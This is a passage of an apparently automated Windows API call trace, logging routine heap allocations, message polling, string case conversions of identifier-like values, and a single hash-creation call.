dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0267.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0267.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0267.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0267.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.388] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0267.388] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.389] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0267.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.389] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0267.389] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.390] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0267.390] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.390] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.390] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.391] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.391] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.391] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.391] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.392] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.392] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.392] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.392] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.393] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0267.393] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.393] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.394] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.394] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.394] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.394] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.394] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.395] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.395] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.395] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.396] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.396] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.396] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.396] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.397] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.397] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.397] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.398] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.398] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.398] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.399] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.399] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.400] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.400] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.400] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.401] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.402] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.402] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.402] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.403] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.404] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.405] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.406] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.406] RtlAllocateHeap 